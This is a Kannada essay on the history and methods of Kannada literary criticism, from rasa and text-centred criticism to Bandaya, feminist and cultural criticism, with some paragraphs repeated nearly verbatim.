ಸಾಹಿತ್ಯ ಮತ್ತು ವಿಮರ್ಶೆ ಅನುಸಂಧಾನದ ಭಿನ್ನ ಮಾರ್ಗಗಳು

ನವೋದಯದಲ್ಲಿ ರಸವಿಮರ್ಶೆ ಪ್ರಾಧಾನ್ಯ ಪಡೆದರೆ ನವ್ಯದಲ್ಲಿ ಪಠ್ಯ ವಿಮರ್ಶೆ ಮೇಲುಗೈಯಾಯಿತು. ನಂತರ ಬಂದ ಬಂಡಾಯ ವಿಮರ್ಶೆಯು ಸಂಸ್ಕೃತಿ ವಿಮರ್ಶೆಯನ್ನು ಕಟ್ಟಿಕೊಳ್ಳತೊಡಗಿತು. ಇಂದು ಸಾಮಾಜಿಕ ಸಾಂಸ್ಕೃತಿಕ ವಿಶ್ಲೇಷಣೆ ಎಂಬಲ್ಲಿಗೆ ಬಂದು ನಿಂತಿದೆ.

ವಿಮರ್ಶೆಯು ಸಾಹಿತ್ಯದ ಜೊತೆ ಜೊತೆಗೇ ಇರುವಂತಹದ್ದು. ಅದೇನು ಸಾಹಿತ್ಯದ ಸೃಜನೇತರ ವಿಭಾಗವಲ್ಲ. ವಾಸ್ತವವಾಗಿ ವಿಮರ್ಶೆಯು ಸೃಜನಶೀಲವಾದುದು. ವಿಮರ್ಶೆ ಎಂದರೆ ವಿದ್ವತ್ತು, ವಿಶ್ಲೇಷಿಸುವ ತಾಕತ್ತು ಎಂದು ಮಾತ್ರ ಭಾವಿಸಬಾರದು. ಅದೊಂದು ಸೃಜನಶೀಲ ಪ್ರಕ್ರಿಯೆ. ವಿಮರ್ಶೆಯಲ್ಲಿ ಸೃಜನಶೀಲತೆಯ ಗೈರುಹಾಜರಿ ಮಾಂತ್ರಿಕ ಸ್ಪರ್ಶ ಇಲ್ಲದ ಕವಿತೆಯ ಸಾಲುಗಳಂತೆಯೇ, ಒಣಗಿ ಜಡವಾಗಿರುತ್ತದೆ. ಸಾಹಿತ್ಯ ಮತ್ತು ವಿಮರ್ಶೆ ಎಂದರೆ ಎರಡು ಭಿನ್ನ ಹಾದಿಗಳು ಎಂದು ಭಾವಿಸುವುದರಿಂದ ಅನೇಕ ಅಪಾಯಗಳಿವೆ.

ಒಂದೆಡೆ ಸೃಜನಶೀಲ ಸಾಹಿತ್ಯ ಎನ್ನುವ ವರ್ಗೀಕರಣದಲ್ಲಿ ಸಾಹಿತ್ಯಕ್ಕೆ ಮಹತ್ವ ಸಿಕ್ಕು ವಿಮರ್ಶೆ ಅದರ ಭಾಗ ಎನ್ನುವುದನ್ನು ಮರೆಯಿಸಿಬಿಡುತ್ತದೆ. ಇನ್ನೊಂದೆಡೆ, ವಿಮರ್ಶೆಗೆ ಅತ್ಯುನ್ನತ ಸ್ಥಾನಮಾನ ನೀಡುವುದರಿಂದ ಅದು ದಂತಗೋಪುರದ ಕ್ರಿಯೆಯಾಗಿ ಪಾಂಡಿತ್ಯ ಪ್ರದರ್ಶನದ ಅಹಂಕಾರದ ವೇದಿಕೆಯಾಗಿಬಿಡುತ್ತದೆ. ಆದುದರಿಂದಲೇ ಸಾಹಿತ್ಯ ಮತ್ತು ವಿಮರ್ಶೆ ಎರಡೂ ಅನುಸಂಧಾನದ ಬೇರೆ ಬೇರೆ ಮಾರ್ಗಗಳು ಎಂದು ಭಾವಿಸಿದರೆ ಸೂಕ್ತ ಎನ್ನಿಸುತ್ತದೆ. ಸಾಹಿತ್ಯರಚನೆ ಎನ್ನುವುದು ಕೇವಲ ವೈಯಕ್ತಿಕ ಕ್ರಿಯೆಯಾಗಿರುವುದಿಲ್ಲ. ಋಜುಮಾರ್ಗದ ಶೋಧನೆಗೆ ಸಾಹಿತ್ಯ ಮತ್ತು ವಿಮರ್ಶೆ ಎರಡೂ ಉತ್ತಮ ಮಾರ್ಗಗಳೇ.

ಕನ್ನಡದ ವಿಮರ್ಶೆಯ ಹರಹು ಕಾಲಾನುಸಾರಿಯಾಗಿ ವಿಭಿನ್ನ ಪಾತ್ರಗಳಲ್ಲಿ ತನ್ನ ಅಸ್ತಿತ್ವವನ್ನು ಪ್ರಕಟಗೊಳಿಸುತ್ತಾ ಬಂದಿದೆ. ನವೋದಯದಲ್ಲಿ ರಸವಿಮರ್ಶೆಯು ಪ್ರಾಧಾನ್ಯವನ್ನು ಪಡೆದರೆ ನವ್ಯದಲ್ಲಿ ಪಠ್ಯ ವಿಮರ್ಶೆ ಮೇಲುಗೈಯಾಯಿತು. ನಂತರ ಬಂದ ಬಂಡಾಯ ವಿಮರ್ಶೆಯು ಸಂಸ್ಕೃತಿ ವಿಮರ್ಶೆಯನ್ನು ಕಟ್ಟಿಕೊಳ್ಳತೊಡಗಿದವು. ಕವಿ, ಕೃತಿನಿಷ್ಠ ಎನ್ನುವ ವಿಮರ್ಶಾ ಪದ್ಧತಿಗಳಿಂದ ಸಾಮಾಜಿಕವಾದ ಆಯಾಮಗಳನ್ನು ಪಡೆದುಕೊಂಡು ಸಾಗುತ್ತಿರುವ ಕನ್ನಡ ವಿಮರ್ಶೆಯು ಇಂದು ಸಾಮಾಜಿಕ ಸಾಂಸ್ಕೃತಿಕ ವಿಶ್ಲೇಷಣೆ ಎಂಬಲ್ಲಿಗೆ ಬಂದು ನಿಂತಿದೆ.

ಕನ್ನಡದ ವಿಮರ್ಶೆಯ ಹರಿವು ಕಾಲಾನುಸಾರಿಯಾಗಿ ವಿಭಿನ್ನ ಪಾತ್ರಗಳಲ್ಲಿ ತನ್ನ ಅಸ್ತಿತ್ವವನ್ನು ಕಂಡುಕೊಂಡಿದೆ. ಕನ್ನಡದಲ್ಲಿ ವಿಮರ್ಶಾ ಪ್ರಸ್ಥಾನಗಳು ನಡೆದು ಬಂದ ರೀತಿಯನ್ನು ಗಮನಿಸಿದರೆ ರಸವಿಮರ್ಶೆ, ಕರ್ತೃ ಅಥವಾ ಬಯೊ ಕ್ರಿಟಿಕಲ್ ವಿಮರ್ಶೆ, ಕೃತಿನಿಷ್ಠ ವಿಮರ್ಶೆ, ಸಮಾಜಮುಖಿಯಾದ ಮಾರ್ಕ್ಸ್ ವಾದಿ, ಸ್ತ್ರೀವಾದಿ, ದಲಿತ ಇತ್ಯಾದಿ ವಿಮರ್ಶೆಗಳು ಹೀಗೆ ನಾಲ್ಕು ಮುಖ್ಯ ಬಿಂದುಗಳಲ್ಲಿ ಗುರುತಿಸಬಹುದು.

ಕನ್ನಡದಲ್ಲಿ ಸಾಂಸ್ಕೃತಿಕ ವಿಮರ್ಶೆ ಹೊಸತಾಗಿ ಬಂದ ಪರಿಕಲ್ಪನೆಯೇನೂ ಅಲ್ಲ. ಕುವೆಂಪು-ಮಾಸ್ತಿ ನಡುವೆ ನಡೆದ ವಾದ ಪ್ರತಿವಾದಗಳು ಸಾಂಸ್ಕೃತಿಕ ವಿಮರ್ಶೆಯೇ ಅಲ್ಲವೇ? ಹಾಗೆ ನೋಡಿದರೆ ಮಾಸ್ತಿ ಕೆದಕಿದ ಸ್ತ್ರೀ ಬರವಣಿಗೆಯ ಶೀಲ ಮತ್ತು ಸಂಯಮದ ಪ್ರಶ್ನೆಯು ಸಹ ಸಾಂಸ್ಕೃತಿಕವಾದುದೇ.

ವಿಮರ್ಶೆಯ ಬೆಳವಣಿಗೆಯನ್ನು ಗಮನಿಸುವವರಿಗೆ ಅದು ಕರ್ತೃ, ಪಠ್ಯ, ಓದುಗ ಹಾಗು ಸಮಾಜಗಳಲ್ಲಿ ಆದ್ಯತೆಗಳನ್ನು ಇಟ್ಟುಕೊಂಡು ವಿಮರ್ಶಾ ಪ್ರಸ್ಥಾನಗಳನ್ನು ಬೆಳೆಸುತ್ತದೆ ಎಂದು ತಿಳಿದಿರುತ್ತದೆ. ಅದರಂತೆ ವಿಮರ್ಶೆಯ ಮಾರ್ಗಗಳನ್ನು ಗುರುತಿಸುವಾಗ ಕಾಲಘಟ್ಟಗಳಲ್ಲಿ ಆಗುವ ಸಂವೇದನೆಗಳ ಬದಲಾವಣೆಯು ಇಣುಕುತ್ತಿರುತ್ತದೆ. ಕನ್ನಡದ ವಿಮರ್ಶೆಯ ಹರಿವು ಕಾಲಾನುಸಾರಿಯಾಗಿ ವಿಭಿನ್ನ ಪಾತ್ರಗಳಲ್ಲಿ ತನ್ನ ಅಸ್ತಿತ್ವವನ್ನು ಕಂಡುಕೊಂಡಿದೆ. ಕನ್ನಡದಲ್ಲಿ ವಿಮರ್ಶಾ ಪ್ರಸ್ಥಾನಗಳು ನಡೆದು ಬಂದ ರೀತಿಯನ್ನು ಗಮನಿಸಿದರೆ ರಸವಿಮರ್ಶೆ, ಕರ್ತೃ ಅಥವಾ ಬಯೊ ಕ್ರಿಟಿಕಲ್ ವಿಮರ್ಶೆ, ಕೃತಿನಿಷ್ಠ ವಿಮರ್ಶೆ, ಸಮಾಜಮುಖಿಯಾದ ಮಾರ್ಕ್ಸ್ ವಾದಿ, ಸ್ತ್ರೀವಾದಿ, ದಲಿತ ಇತ್ಯಾದಿ ವಿಮರ್ಶೆಗಳು ಹೀಗೆ ನಾಲ್ಕು ಮುಖ್ಯ ಬಿಂದುಗಳಲ್ಲಿ ಗುರುತಿಸಬಹುದು.

ಇದುವರೆಗಿನ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯು ಕನ್ನಡದಲ್ಲಿ ಬೇರೆ ಬೇರೆ ನೆಲೆಗಳಲ್ಲಿ ಆಪರೇಟ್ ಆಗುತ್ತಾ ಬಂದಿದೆ. ಸಾಹಿತ್ಯಕ್ಕೆ ಬರೆಯುವ ಟೀಕುಗಳಿಂದ ಹಿಡಿದು ಮುನ್ನುಡಿಗಳು, ಕೃತಿಯ ಪ್ರಸ್ತಾವನೆಗಳು, ಪುಸ್ತಕ ವಿಮರ್ಶೆ ಹಾಗು ಪತ್ರಿಕಾ ಬರಹಗಳಲ್ಲಿ ಕಾಣುವ ವೈವಿಧ್ಯಮಯವಾದ ವಿಮರ್ಶಾ ಬರಹಗಳು ವಿಮರ್ಶೆಯನ್ನು ಕಲ್ಪಿಸಿಕೊಂಡ ಬಗೆ ಯುಗಧರ್ಮ ಎಂದು ತಿಳಿದ ಮೌಲ್ಯಗಳಿಗೆ ಸಮೀಪ ಇದ್ದಂತವು. ಕಾಲಧರ್ಮಕ್ಕೆ ತಕ್ಕಂತೆ ಇವುಗಳ ಆಯ್ಕೆಯ ಆದ್ಯತೆಗಳು ಪಲ್ಲಟಗೊಳ್ಳುತ್ತಾ ಬಂದಿವೆ. ಇವು ಚಳವಳಿಗಳ ಸಂದರ್ಭಗಳಲ್ಲಿ ಬಹುತೇಕ ಪತ್ರಿಕೆಗಳ ಮೂಲಕ  ಅಥವಾ ಸೆಮಿನಾರ್, ಸಮ್ಮೇಳನಗಳ ಮೂಲಕ ಇನ್ನಷ್ಟು ಕ್ರಿಯಾಶೀಲವಾಗಿ ಪ್ರಕಟಗೊಳ್ಳುತ್ತವೆ. ಇವುಗಳಲ್ಲಿ ವ್ಯಕ್ತವಾಗುವ ಆದ್ಯತೆಯು ಕಾಲಘಟ್ಟದ ಸಂವೇದನೆಯನ್ನು ರೂಪಿಸುವ, ತಿದ್ದುವ ಆಸಕ್ತಿ ಹೊಂದಿದ್ದು ಅದು ರಾಜಕೀಯವಾದ ನಡೆಯಾಗಿರುತ್ತದೆ. 

ಅಡಿಗರ ‘ಭೂಮಿಗೀತ’ಕ್ಕೆ ಬರೆದ ಯು.ಆರ್.ಅನಂತಮೂರ್ತಿಯವರ ಮುನ್ನುಡಿ, ತೇಜಸ್ವಿ ತಮ್ಮ ಕಥಾ ಸಂಕಲನಕ್ಕೆ ತಾವೇ ಬರೆದ ‘ಹೊಸ ದಿಗಂತದತ್ತ’ ಎಂಬ ಮುನ್ನುಡಿ, ಲಂಕೇಶರು ‘ಅಕ್ಷರ ಹೊಸ ಕಾವ್ಯ’ಕ್ಕೆ ಮುನ್ನ ಬರೆದ ನುಡಿಗಳು, ತೀ.ನಂ.ಶ್ರೀ., ಬಿ.ಎಂ.ಶ್ರೀ ಅವರ ‘ ಇಂಗ್ಲಿಷ್ ಗೀತಗಳು’ ಕೃತಿಗೆ ಬರೆದ ಮುನ್ನುಡಿ ಹೀಗೆ ಹೆಸರಿಸಬಹುದು.

ಪುಸ್ತಕ ವಿಮರ್ಶೆಗಳು, ಪತ್ರಿಕೆಗಳಲ್ಲಿ ಬರುವ ರಿವ್ಯೂಗಳು ಚಳವಳಿಯ ರಾಜಕಾರಣದ ಭಾಗ. ಜೊತೆಗೆ ಆಯಾ ಚಳವಳಿಗಳ ಕಾಲದಲ್ಲಿ ಬಂದ ಶ್ರೇಷ್ಠ ಎನ್ನಿಸುವ ಕೃತಿಗಳಿಗೆ ಬರೆದ ಮುನ್ನುಡಿಗಳು ಚಳವಳಿಯ ಚೈತನ್ಯವನ್ನು ಪ್ರಸರಿಸುತ್ತಿರುತ್ತವೆ. ಅಡಿಗರ ‘ಭೂಮಿಗೀತ’ಕ್ಕೆ ಬರೆದ ಯು.ಆರ್.ಅನಂತಮೂರ್ತಿಯವರ ಮುನ್ನುಡಿ, ತೇಜಸ್ವಿ ತಮ್ಮ ಕಥಾ ಸಂಕಲನಕ್ಕೆ ತಾವೇ ಬರೆದ ‘ಹೊಸ ದಿಗಂತದತ್ತ’ ಎಂಬ ಮುನ್ನುಡಿ, ಲಂಕೇಶರು ‘ಅಕ್ಷರ ಹೊಸ ಕಾವ್ಯ’ಕ್ಕೆ ಮುನ್ನ ಬರೆದ ನುಡಿಗಳು, ತೀ.ನಂ.ಶ್ರೀ., ಬಿ.ಎಂ.ಶ್ರೀ ಅವರ ‘ ಇಂಗ್ಲಿಷ್ ಗೀತಗಳು’ ಕೃತಿಗೆ ಬರೆದ ಮುನ್ನುಡಿ ಹೀಗೆ ಹೆಸರಿಸಬಹುದು.

ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ರಾಜಕಾರಣ ಕೃತಿಯ ಒಳಗನ್ನು ಕುರಿತು ಚರ್ಚಿಸುವುದಕ್ಕಿಂತ ಕೃತಿಯ ಹೊರಗಿನ ಸಂಗತಿಗಳಲ್ಲೇ ಆಸಕ್ತವಾದಾಗ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಸ್ವರೂಪ ವಿನಾಶದ ಸ್ವರೂಪ ಪಡೆದುಕೊಂಡು ಸಮಾಜದ ಸ್ವಾಸ್ಥ್ಯವನ್ನು ಕೆಡಿಸುವ ಘಟನೆಗಳಿಗೆ ಕಾರಣವಾಗಬಹುದು. ಇಲ್ಲಿ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ತತ್ವಗಳು ಹಾರಿಹೋಗಿ ಕೃತಿ ವ್ಯವಹರಿಸುವ ಕಲಾಮಾಧ್ಯಮದ ನಿಯಮಗಳನ್ನು ಮೀರುತ್ತವೆ. ಇವು ಗಾಳಿಗುದ್ದುವ ಗೂಳಿಯಂತೆ ವ್ಯರ್ಥಪ್ರಯತ್ನಗಳಾದರೂ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಗಾಂಭೀರ್ಯವನ್ನು ಹಾಳು ಮಾಡುತ್ತವೆ ಅಲ್ಲದೆ ಕೃತಿಯು ಮೂಡಿಸುವ ಭಾವನೆ ಉದ್ರಿಕ್ತತೆಯತ್ತ ಮಾತ್ರ ಗಮನ ಹರಿಸುವಂತೆ ಮಾಡುತ್ತದೆ. ಈ ಬಗೆಯ ರಾಜಕಾರಣವು ಚಳವಳಿಯ ಸಂದರ್ಭದಲ್ಲಿಯೇ ಸಂಭವನೀಯವಾಗಿರುತ್ತದೆ. ಇದಕ್ಕಾಗಿ ಚಳವಳಿಗಳನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ಹೊಣೆ ಮಾಡಲಾಗದು. ಆದರೆ ಅವು ಪ್ರೇರೇಪಿಸುವ ಕೆಲವು ಸಂಗತಿಗಳು ವಿಮರ್ಶೆಯನ್ನು ಉಗ್ರವಾಗಿ ಝಳಪಿಸುವಂತೆ ಮಾಡುತ್ತವೆ.

ಮೀಮಾಂಸೆ ಮತ್ತು ವಿಮರ್ಶೆಗಳ ಎಳೆಗಳನ್ನು ಹಿಡಿದು ಹೊರಟರೆ ಕನ್ನಡ ವಿಮರ್ಶೆಯ ಸಿಕ್ಕುಗಳು ಬಿಚ್ಚಿಕೊಳ್ಳುತ್ತವೆ. ಕನ್ನಡವು ಹುಡುಕಾಡಿದ ಮೀಮಾಂಸೆಯ ಪ್ರಯತ್ನಗಳು ಹಾಗೂ ಕಾಲಕಾಲಕ್ಕೆ ರೂಢಿಸಿಕೊಳ್ಳಲೆತ್ನಿಸಿದ ವಿಮರ್ಶಾ ಮಾನದಂಡಗಳು ಇವು ಕನ್ನಡ ವಿಮರ್ಶೆಯ ಇತಿಹಾಸದಲ್ಲಿ ನಿರಂತರವಾಗಿ ಕಾಣುವ ಪ್ರಕ್ರಿಯೆಗಳು. ಸಮಸ್ಯೀಕರಿಸಿಕೊಳ್ಳುವುದಾದರೆ ಈ ರೀತಿಯ ನಡೆಗಳನ್ನೇ.

ವಿಮರ್ಶೆ ಹಾಗು ಮೀಮಾಂಸೆಗಳು ಒಂದೇ ತೂಕದವೇ? ಎನ್ನುವ ವಿಷಯದಲ್ಲಿ ತಕರಾರಿದೆ. ಸಾಹಿತ್ಯ ತತ್ವಗಳು, ಸಾಮಾಜಿಕ ಮತ್ತು ರಾಜಕೀಯ ತತ್ವಗಳು ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯನ್ನು ಪ್ರಭಾವಿಸುತ್ತವೆಯಾದರೂ ಇವೆರಡಕ್ಕೂ ಅಂತರ ಇದೆ ಎಂದು ಒಂದು ವಿಮರ್ಶಕವರ್ಗ ಭಾವಿಸುತ್ತದೆ. ಆದರೆ ಕೆಲವರು ಮೀಮಾಂಸೆಯ ತತ್ವಗಳೇ ವಿಮರ್ಶೆಯಲ್ಲಿ  ಉಪಯೋಗವಾಗುವುದರಿಂದ ಅವೆರಡಕ್ಕೂ ಸಂಬಂಧವಿದೆ ಎನ್ನುತ್ತಾರೆ. ವಿಮರ್ಶೆ ಮತ್ತು ಮೀಮಾಂಸೆಗಳು ಸಾಹಿತ್ಯ ಚಳವಳಿಯ ಸಂದರ್ಭಗಳಲ್ಲಿ ಹೇಗೆ ಅವತರಿಸುತ್ತವೆ ಎನ್ನುವುದೇ ಶೋಧಿಸಿಕೊಳ್ಳಬೇಕಾದ ಸಂಗತಿ.

ಕೆಲವೊಮ್ಮೆ ಪುಸ್ತಕ ವಿಮರ್ಶೆ, ಮುನ್ನುಡಿಗಳು, ಅಕಾಡೆಮಿಕ್ ರಿವ್ಯೂಗಳು ಒಂದು ಸಾಹಿತ್ಯ ಚಳವಳಿಯ ಕೆಲವಂಶಗಳನ್ನು ಮುನ್ನೆಲೆಗೆ ತರುತ್ತದೆ. ಸಿದ್ಧಾಂತವೇ ಪ್ರಧಾನವಾಗಿ ಬಂದ ಪ್ರಗತಿಶೀಲ, ಬಂಡಾಯದಂತಹ ಸಾಹಿತ್ಯ ಚಳವಳಿಗಳಲ್ಲಿ ಮಿಳಿತವಾದ ಸಿದ್ಧಾಂತಗಳ ಎಳೆ ಹಿಡಿದು ಸಾಹಿತ್ಯ ಮೀಮಾಂಸೆಯನ್ನು ರೂಪಿಸಿಕೊಳ್ಳುವ ಪ್ರಯತ್ನಗಳೂ ನಡೆದಿವೆ. ಮೀಮಾಂಸೆ ಮತ್ತು ವಿಮರ್ಶೆಗಳ ಎಳೆಗಳನ್ನು ಹಿಡಿದು ಹೊರಟರೆ ಕನ್ನಡ ವಿಮರ್ಶೆಯ ಸಿಕ್ಕುಗಳು ಬಿಚ್ಚಿಕೊಳ್ಳುತ್ತವೆ. ಕನ್ನಡವು ಹುಡುಕಾಡಿದ ಮೀಮಾಂಸೆಯ ಪ್ರಯತ್ನಗಳು ಹಾಗೂ ಕಾಲಕಾಲಕ್ಕೆ ರೂಢಿಸಿಕೊಳ್ಳಲೆತ್ನಿಸಿದ ವಿಮರ್ಶಾ ಮಾನದಂಡಗಳು ಇವು ಕನ್ನಡ ವಿಮರ್ಶೆಯ ಇತಿಹಾಸದಲ್ಲಿ ನಿರಂತರವಾಗಿ ಕಾಣುವ ಪ್ರಕ್ರಿಯೆಗಳು. ಸಮಸ್ಯೀಕರಿಸಿಕೊಳ್ಳುವುದಾದರೆ ಈ ರೀತಿಯ ನಡೆಗಳನ್ನೇ.

ಕನ್ನಡ ವಿಮರ್ಶೆಯ ನಡೆಯಲ್ಲಿ ಅದು ತನ್ನದೇ ಆದ ಮೀಮಾಂಸೆಯನ್ನು ಶೋಧಿಸಿಕೊಂಡಿದೆಯೇ ಎನ್ನುವ ಪ್ರಶ್ನೆಯನ್ನು ಕೇಳಿಕೊಳ್ಳಲಾಗಿದೆ. ರಹಮತ್ತ ರೀಕೆರೆಯವರಂತಹ ವಿದ್ವಾಂಸರು ‘ಕನ್ನಡಕ್ಕೆ ಬೇಕು ಕನ್ನಡದ್ದೇ ಮೀಮಾಂಸೆ’ ಎನ್ನುವ ವಾದವನ್ನು ಎತ್ತಿದರು. ಇದರಿಂದ ಕನ್ನಡ ವಿಮರ್ಶೆಯು ತನ್ನದೇ ಆದ ಮೀಮಾಂಸೆಯನ್ನು ಇನ್ನೂ ಶೋಧಿಸಿಕೊಳ್ಳುವ ಯತ್ನದಲ್ಲಿದೆ ಎಂದಂತಾಯ್ತು. ಕರ್ನಾಟಕ ಸಾಹಿತ್ಯ ಅಕಾಡೆಮಿ ಹೊರತಂದ ಶತಮಾನದ ವಿಮರ್ಶೆಯ ಸಂಕಲನಕ್ಕೆ ಪ್ರಸ್ತಾವನೆ ಬರೆಯುವಾಗ ಎಚ್.ಎಸ್.ರಾಘವೇಂದ್ರರಾವ್ ಅವರು ‘ಸ್ವಲ್ಪ ಮೈಚಳಿಬಿಟ್ಟು, ಸಾಹಿತ್ಯವನ್ನು ಕೇವಲ ಚಿಮ್ಮುಹಲಗೆಯಾಗಿ ಬಳಸಿಕೊಂಡು, ಸಂಸ್ಕೃತಿ ಸಿದ್ಧಾಂತಗಳನ್ನು ರೂಪಿಸುವ ನೆಲೆಗಳನ್ನು ತಲುಪುವವರೆಗೆ ಪರಿಸ್ಥಿತಿಯು ಬದಲಾಗುವುದಿಲ್ಲ’ ಎಂದಿದ್ದಾರೆ. ಇದರಿಂದ ಕನ್ನಡದ
ವಿಮರ್ಶೆಯ ಸ್ವರೂಪವನ್ನು ಇನ್ನೂ ಶೋಧಿಸಿಕೊಳ್ಳುವ ಅಗತ್ಯವಿದೆ ಎನ್ನುವ ಅಂಶ ಮುನ್ನೆಲೆಗೆ ಬಂದಿದೆ.

ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಸಂದರ್ಭದಲ್ಲಿ ಇದು ಸಾಹಿತ್ಯದ ಬಗ್ಗೆ ತತ್ವವನ್ನು ರೂಪಿಸಿಕೊಳ್ಳುವುದರಿಂದ ಹಿಡಿದು ವಿಮರ್ಶೆಗೆ ಆಯ್ಕೆ ಮಾಡಿಕೊಳ್ಳುವ ಕೃತಿಯ ಹಿಂದೆ ಇರುವ ತನಕದ ಆಯ್ಕೆಯ ಮಾನದಂಡಗಳು ರಾಜಕಾರಣಕ್ಕೆ ಎಡೆ ಮಾಡಿಕೊಟ್ಟಿತು.

ಸಂಸ್ಕೃತಿ ವಿಮರ್ಶೆ ಎನ್ನುವುದು ವಿಶಾಲಾರ್ಥದಲ್ಲಿ ಸಂಸ್ಕೃತಿಯ ಅರ್ಥವೇ. ಅಂದರೆ ಅದು ಜನಸಮುದಾಯದ ನಡೆ, ನುಡಿ, ಆಚಾರಗಳನ್ನು ಒಳಗೊಂಡಿರುವಂಥದ್ದು. ಆದರೆ ಸಂಸ್ಕೃತಿಯ ವಿಷಯ ಪ್ರಸ್ತಾಪವಾದ ಕೂಡಲೇ ಅಲ್ಲಿ ಅನನ್ಯತೆಯ ಮಾತೂ ಬರುತ್ತದೆ ಹಾಗೆಯೇ ಅನ್ಯತೆಯ ಸಂಗತಿಯೂ ಬರುತ್ತದೆ. ಶ್ರೇಷ್ಠ, ಕನಿಷ್ಠಗಳೆಂಬ ಅಳತೆಗೋಲುಗಳನ್ನು ಹಿಡಿದ ತಕ್ಷಣ ಅಲ್ಲಿ ರಾಜಕಾರಣವು ಪ್ರವೇಶ ಮಾಡುತ್ತದೆ. ಸಂಸ್ಕೃತಿ ವಿಮರ್ಶೆಯ ಅಗತ್ಯವನ್ನು ರೂಪಿಸುವ ಯುಗಧರ್ಮದ ಒತ್ತಡವೂ ಇದರ ಹಿಂದೆ ಕೆಲಸ ಮಾಡುತ್ತದೆ. ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯು ಸಂಸ್ಕೃತಿಯ ಚುಂಗು ಹಿಡಿದು ಹೊರಟಾಗ ಅದು ಅನಿವಾರ್ಯವಾಗಿ ರಾಜ ಕಾರಣದ ಸ್ವರೂಪವನ್ನು ಪಡೆದುಕೊಳ್ಳುತ್ತದೆ. ತನ್ನ ಅಭಿಪ್ರಾಯಗಳನ್ನು ರೂಪಿಸಿಕೊಳ್ಳುವ ಹೊತ್ತಿನಲ್ಲಿಯೇ ಒಂದು ಆಯ್ಕೆಯನ್ನು ಮುನ್ನೆಲೆಗೆ ತರುತ್ತಾ ಇರುತ್ತದೆ.

ಕುವೆಂಪು ಕಾದಂಬರಿಯ ಆರಂಭಿಕ ಸಾಲು, ‘ಇಲ್ಲಿ ಯಾರೂ ಮುಖ್ಯರಲ್ಲ, ಯಾರೂ ಅಮುಖ್ಯರಲ್ಲ’ ಎನ್ನುವ ಮಾತು ಮೀಮಾಂಸೆಯ ದೃಷ್ಟಿಯಿಂದ ಬಹಳಷ್ಟನ್ನು ಕೊಟ್ಟಿತು. ಕನ್ನಡದ ಸಂಸ್ಕೃತಿ ವಿಮರ್ಶೆಯ ಸೂಚಿ ಇದರಿಂದ ಸಿಕ್ಕಿತು. ಆದರೆ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಸಂದರ್ಭದಲ್ಲಿ ಇದು ಸಾಹಿತ್ಯದ ಬಗ್ಗೆ ತತ್ವವನ್ನು ರೂಪಿಸಿಕೊಳ್ಳುವುದರಿಂದ ಹಿಡಿದು ವಿಮರ್ಶೆಗೆ ಆಯ್ಕೆ ಮಾಡಿಕೊಳ್ಳುವ ಕೃತಿಯ ಹಿಂದೆ ಇರುವ ತನಕದ ಆಯ್ಕೆಯ ಮಾನದಂಡಗಳು ರಾಜಕಾರಣಕ್ಕೆ ಎಡೆ ಮಾಡಿಕೊಟ್ಟಿತು. ಲೇಖಕನ ಜಾತಿ, ವರ್ಗಗಳ ದೃಷ್ಟಿಯಿಂದ ಸಾಹಿತ್ಯ ಚಳವಳಿಗಳು ಪ್ರೇರೇಪಿಸಿದ ಕೆಲವು ಸಂಗತಿಗಳನ್ನು ಉತ್ಪ್ರೇಕ್ಷಿಸಿ ವಿಮರ್ಶೆ ಮಾಡುವುದು.
ಇವೆಲ್ಲಕ್ಕಿಂತ ಮಿಗಿಲಾಗಿ ವಿಮರ್ಶೆಯ  ಭಾಷೆಯ ರಾಜಕಾರಣ, ವಸಾಹತೀಕರಣ ಮತ್ತು ಭಾರತೀಯ ಕಾವ್ಯಮೀಮಾಂಸೆಯ ನಡುವಿನ ಆಯ್ಕೆಯ ಗೊಂದಲಗಳು, ಯಾವುದಾದರೊಂದು ಹೊರಗಿನ ಮಾದರಿಗಳ ಸಾತತ್ಯದಿಂದ ಸೃಷ್ಟಿಯಾಗುವ ವಿಮರ್ಶೆಗಳು ಸದಾ ತೊಡಕುಗಳಾಗಿ ಉಳಿಯುತ್ತವೆ.

ಸೋದರಿತ್ವದ ಕಲ್ಪನೆಯಲ್ಲಿ ಸ್ತ್ರೀ ಸಮುದಾಯವನ್ನು ಪ್ರತಿನಿಧಿಸುವ ಹಾಗೂ ಗಂಡು ಕಟ್ಟಿದ ಪಠ್ಯ ಹಾಗೂ ಅವನ ಭಾಷೆಗಳನ್ನು ನಿರಚನೆ ಮಾಡಿ ಕೊಳ್ಳುವ ಪ್ರಯತ್ನವನ್ನು ಕನ್ನಡ ಸ್ತ್ರೀವಾದಿ ವಿಮರ್ಶೆಯು ಎತ್ತಿಕೊಂಡಿತು.

ಆದರೆ ಕನ್ನಡದ ಜಾಯಮಾನದಲ್ಲಿ ಅದು ಭಾರತೀಯ ಕಾವ್ಯ ಮೀಮಾಂಸೆಯನ್ನಾಗಲೀ ಪಾಶ್ಚಾತ್ಯ ವಿಮರ್ಶೆಯ ತತ್ವಗಳನ್ನಾಗಲೀ ಪೂರ್ಣವಾಗಿ ಅವಲಂಬಿಸಿಲ್ಲ. ಅದು ನಾಡು, ನುಡಿಗಳ ಸಮಷ್ಟಿಯ ವಿವೇಕದತ್ತ ತುಡಿಯುವ ಕ್ರಿಯಾಶೀಲ ಪ್ರಕ್ರಿಯೆಯಾಗಿ ಮುಂದುವರೆಯಲು ಬಯಸುತ್ತದೆ ಎನ್ನುವುದು ವಿದಿತ.

